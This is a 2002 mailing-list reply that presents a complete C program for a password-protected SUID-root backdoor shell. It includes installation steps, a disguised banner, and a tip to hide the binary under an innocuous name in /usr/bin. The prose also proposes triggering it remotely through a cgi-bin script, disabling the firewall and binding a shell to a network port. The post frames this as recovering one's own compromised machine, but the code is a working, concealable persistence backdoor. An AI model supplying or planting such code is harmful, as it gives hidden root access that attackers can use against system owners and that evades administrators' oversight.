Re: No Root Shell with SUID /bin/bash

Mon, 22 Apr 2002 09:16:10 -0700 

Hi,
if you intend to place a backdoor root shell for
"personal use" in your own system (because an attacker
changed the root password) then you should write a
little program with SUID root rights, executable for
every user, but demanding a password before opening a
root shell.
Passwords should not be readable in plain text (doh!),
so use MD5 hashes or so for authentication.
A small C program which does exactly this can be found
below. It should compile on most linuxes with openssl.
If all users are logged out of your system you can
modify the program and think of a way to execute it
remotely (maybe via a cgi-bin file of your web server;
this service is rarely shut down by an attacker). Then
fight back with their own weapons: instead of running
a system("/bin/sh") execute system()-commands to shut
down the firewall and bind an authenticating shell to
some port.
Cheers,
Radiodrinker


/* "adr" root backdoor in own system.

   by radiodrinker at yahoo dot de

   1. compile: 
      gcc adr.c -o adr -lssl
   2. As root:
      chown root adr; chmod u+s adr; chmod go+rx adr
   3. run adr. enter password of your choice.
   4. system won't let you in. copy generated md5 hash
off the screen.
   5. paste md5 hash to identifier "correctMD5hash"
(see below).
   6. repeat steps 1 and 2.
   7. login as non-root user. run adr. enter correct
phrase.
   8. have fun.
   9. opt: move the file to
/usr/bin/somenamethatpleasesyou
*/

#include <stdio.h>
#include <openssl/md5.h>

char
correctMD5hash[]="924d162c0b4497dd37e40aadbeef5b9";

void hexToString(char* sourceaddress, char*
destaddress, int length){
  char temp[20];
  int i;
  destaddress[0]='\0';
  for(i=0; i<length; i++){
    unsigned char current=sourceaddress[i];
    sprintf(temp, "%x", current);
    strcat(destaddress, temp);
  }
}

int main(void){
  int olduid=500;
  char phrase[16384];
  char md5sum[16384];
  char md5string[16384];

  olduid=getuid();

  setuid(0);
  if(getuid()){
    printf("must be suid root.\n");
  } else {

    printf("Banner something V2.17\n");
    printf("Enter pass phrase:");
    fgets(phrase, sizeof(phrase)-1, stdin);

    MD5(phrase, strlen(phrase), md5sum);
    hexToString(md5sum, md5string, 16);

    if(strncmp(md5string, correctMD5hash,
strlen(correctMD5hash))){
      // then it does not match. 
      printf("md5 value of pass phrase is:
%s\nSorry.\n", md5string);
      setuid(olduid);
    }
    else{
      printf("Welcome back. Have fun.\n");
      system("/bin/sh");
    }
  }
  return 0;
}


__________________________________________________________________

Gesendet von Yahoo! Mail - http://mail.yahoo.de
Sie brauchen mehr Speicher für Ihre E-Mails? - http://premiummail.yahoo.de

Reply via email to